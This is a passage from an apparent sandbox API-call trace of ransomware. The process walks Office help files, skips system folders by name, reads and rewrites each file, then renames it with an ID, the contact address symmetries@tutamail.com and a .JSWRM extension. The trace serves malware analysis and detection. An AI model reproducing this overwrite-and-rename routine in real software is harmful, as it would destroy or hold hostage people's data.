(hObject=0x238) returned 1 [0114.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0114.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0114.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0114.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0114.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0114.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0114.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.546] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_ONLINE.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_online.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_ONLINE.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_online.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0114.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0114.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0114.547] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa3430bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa3430bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa38f59d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28b, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="LYNC_ONLINE_COL.HXC", cAlternateFileName="LYNC_O~1.HXC")) returned 1 [0114.547] lstrcmpiW (lpString1="LYNC_ONLINE_COL.HXC", lpString2=".") returned 1 [0114.547] lstrcmpiW (lpString1="LYNC_ONLINE_COL.HXC", lpString2="..") returned 1 [0114.547] lstrcmpiW (lpString1="LYNC_ONLINE_COL.HXC", lpString2="...") returned 1 [0114.547] lstrcmpiW (lpString1="LYNC_ONLINE_COL.HXC", lpString2="windows") returned -1 [0114.547] lstrcmpiW (lpString1="LYNC_ONLINE_COL.HXC", lpString2="recovery") returned -1 [0114.547] lstrcmpiW (lpString1="LYNC_ONLINE_COL.HXC", lpString2="perflogs") returned -1 [0114.548] lstrcmpiW (lpString1="LYNC_ONLINE_COL.HXC", lpString2="documents and settings") returned 1 [0114.548] lstrcmpiW (lpString1="LYNC_ONLINE_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0114.548] lstrcmpiW (lpString1="LYNC_ONLINE_COL.HXC", lpString2="system volume information") returned -1 [0114.548] lstrcmpiW (lpString1="LYNC_ONLINE_COL.HXC", lpString2="msocache") returned -1 [0114.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ONLINE_COL.HXC", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0114.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0114.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ONLINE_COL.HXC", cchWideChar=19, lpMultiByteStr=0x240f20, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ONLINE_COL.HXC", lpUsedDefaultChar=0x0) returned 19 [0114.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ONLINE_COL.HXC", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0114.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0114.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ONLINE_COL.HXC", cchWideChar=19, lpMultiByteStr=0x240fe8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ONLINE_COL.HXC", lpUsedDefaultChar=0x0) returned 19 [0114.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0114.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0114.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0114.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_ONLINE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_online_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.549] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=651) returned 1 [0114.549] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x280) returned 0x20b1f8 [0114.549] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x280, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x280, lpOverlapped=0x0) returned 1 [0114.588] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.588] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x280, lpOverlapped=0x0) returned 1 [0114.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0114.588] CloseHandle (hObject=0x238) returned 1 [0114.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0114.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0114.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0114.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0114.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0114.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0114.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0114.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0114.589] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_ONLINE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_online_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_ONLINE_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_online_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0114.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0114.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0114.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0114.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0114.590] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9ac4a8a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9ac4a8a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9b5d49a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd3, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="LYNC_ONLINE_COL.HXT", cAlternateFileName="LYNC_O~1.HXT")) returned 1 [0114.590] lstrcmpiW (lpString1="LYNC_ONLINE_COL.HXT", lpString2=".") returned 1 [0114.590] lstrcmpiW (lpString1="LYNC_ONLINE_COL.HXT", lpString2="..") returned 1 [0114.590] lstrcmpiW (lpString1="LYNC_ONLINE_COL.HXT", lpString2="...") returned 1 [0114.590] lstrcmpiW (lpString1="LYNC_ONLINE_COL.HXT", lpString2="windows") returned -1 [0114.590] lstrcmpiW (lpString1="LYNC_ONLINE_COL.HXT", lpString2="recovery") returned -1 [0114.591] lstrcmpiW (lpString1="LYNC_ONLINE_COL.HXT", lpString2="perflogs") returned -1 [0114.591] lstrcmpiW (lpString1="LYNC_ONLINE_COL.HXT", lpString2="documents and settings") returned 1 [0114.591] lstrcmpiW (lpString1="LYNC_ONLINE_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0114.591] lstrcmpiW (lpString1="LYNC_ONLINE_COL.HXT", lpString2="system volume information") returned -1 [0114.591] lstrcmpiW (lpString1="LYNC_ONLINE_COL.HXT", lpString2="msocache") returned -1 [0114.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ONLINE_COL.HXT", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0114.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0114.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ONLINE_COL.HXT", cchWideChar=19, lpMultiByteStr=0x241128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ONLINE_COL.HXT", lpUsedDefaultChar=0x0) returned 19 [0114.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ONLINE_COL.HXT", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0114.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0114.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ONLINE_COL.HXT", cchWideChar=19, lpMultiByteStr=0x2410d8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ONLINE_COL.HXT", lpUsedDefaultChar=0x0) returned 19 [0114.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0114.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0114.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0114.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_ONLINE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_online_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.592] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=211) returned 1 [0114.592] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0114.592] ReadFile (in: hFile=0x238, lpBuffer=0x22dd70, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22dd70*, lpNumberOfBytesRead=0x345e89c*=0xd0, lpOverlapped=0x0) returned 1 [0114.593] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.593] WriteFile (in: hFile=0x238, lpBuffer=0x22dd70*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22dd70*, lpNumberOfBytesWritten=0x345e898*=0xd0, lpOverlapped=0x0) returned 1 [0114.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0114.593] CloseHandle (hObject=0x238) returned 1 [0114.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0114.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0114.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0114.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0114.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0114.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0114.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.594] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_ONLINE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_online_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_ONLINE_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_online_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0114.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0114.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0114.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0114.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0114.595] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9b8364e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9b8364e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9ba9874, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="LYNC_ONLINE_F_COL.HXK", cAlternateFileName="LYNC_O~2.HXK")) returned 1 [0114.595] lstrcmpiW (lpString1="LYNC_ONLINE_F_COL.HXK", lpString2=".") returned 1 [0114.595] lstrcmpiW (lpString1="LYNC_ONLINE_F_COL.HXK", lpString2="..") returned 1 [0114.595] lstrcmpiW (lpString1="LYNC_ONLINE_F_COL.HXK", lpString2="...") returned 1 [0114.595] lstrcmpiW (lpString1="LYNC_ONLINE_F_COL.HXK", lpString2="windows") returned -1 [0114.595] lstrcmpiW (lpString1="LYNC_ONLINE_F_COL.HXK", lpString2="recovery") returned -1 [0114.595] lstrcmpiW (lpString1="LYNC_ONLINE_F_COL.HXK", lpString2="perflogs") returned -1 [0114.595] lstrcmpiW (lpString1="LYNC_ONLINE_F_COL.HXK", lpString2="documents and settings") returned 1 [0114.595] lstrcmpiW (lpString1="LYNC_ONLINE_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0114.595] lstrcmpiW (lpString1="LYNC_ONLINE_F_COL.HXK", lpString2="system volume information") returned -1 [0114.595] lstrcmpiW (lpString1="LYNC_ONLINE_F_COL.HXK", lpString2="msocache") returned -1 [0114.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ONLINE_F_COL.HXK", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0114.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0114.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ONLINE_F_COL.HXK", cchWideChar=21, lpMultiByteStr=0x2410d8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ONLINE_F_COL.HXK", lpUsedDefaultChar=0x0) returned 21 [0114.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ONLINE_F_COL.HXK", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0114.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0114.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ONLINE_F_COL.HXK", cchWideChar=21, lpMultiByteStr=0x240ef8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ONLINE_F_COL.HXK", lpUsedDefaultChar=0x0) returned 21 [0114.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0114.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0114.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0114.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_ONLINE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_online_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.599] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0114.599] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0114.599] ReadFile (in: hFile=0x238, lpBuffer=0x209710, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209710*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0114.600] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.600] WriteFile (in: hFile=0x238, lpBuffer=0x209710*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209710*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0114.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0114.600] CloseHandle (hObject=0x238) returned 1 [0114.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0114.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, 